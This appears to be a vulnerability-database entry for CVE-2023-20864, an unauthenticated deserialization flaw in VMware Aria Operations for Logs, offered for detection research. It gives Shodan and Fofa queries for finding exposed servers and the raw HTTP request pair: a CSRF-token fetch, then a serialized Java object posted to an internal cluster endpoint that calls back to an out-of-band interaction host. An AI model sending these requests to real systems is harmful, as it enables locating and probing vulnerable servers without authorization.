🔙 목록으로 돌아가기

CVE-2023-20864: VMware Aria Operations for Logs - Unauthenticated Remote Code Execution

TitleVMware Aria Operations for Logs - Unauthenticated Remote Code Execution
Authorrootxharsh,iamnoooob,pdresearch
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationApply the necessary security patches or updates provided by VMware to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.92927
CVE IDCVE-2023-20864
CWE IDCWE-502
Shodan Querytitle:"vRealize Log Insight"http.title:"vrealize log insight"
Fofa Querytitle="vrealize log insight"
Tags cve2023 cve vmware aria rce oast vuln

🔍 Vulnerability Description

VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.

🌐 HTTP Request

GET /csrf HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
X-Csrf-Token: Fetch
Accept-Encoding: gzip
POST /api/v2/internal/cluster/applyMembership HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Connection: close
Content-Length: 337
Content-type: application/octet-stream
X-CSRF-Token: NJOdMq
Accept-Encoding: gzip

��srjava.util.HashMap���`�F
loadFactorI	thresholdxp?@wsrjava.net.URL�%76��rIhashCodeIportL	authoritytLjava/lang/String;Lfileq~Lhostq~Lprotocolq~Lrefq~xp��������t+d5jki4hle0o11g2pad407ssn6hfuhta46.oast.livetq~thttppxt2http://d5jki4hle0o11g2pad407ssn6hfuhta46.oast.livex

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-20864.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-20864.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A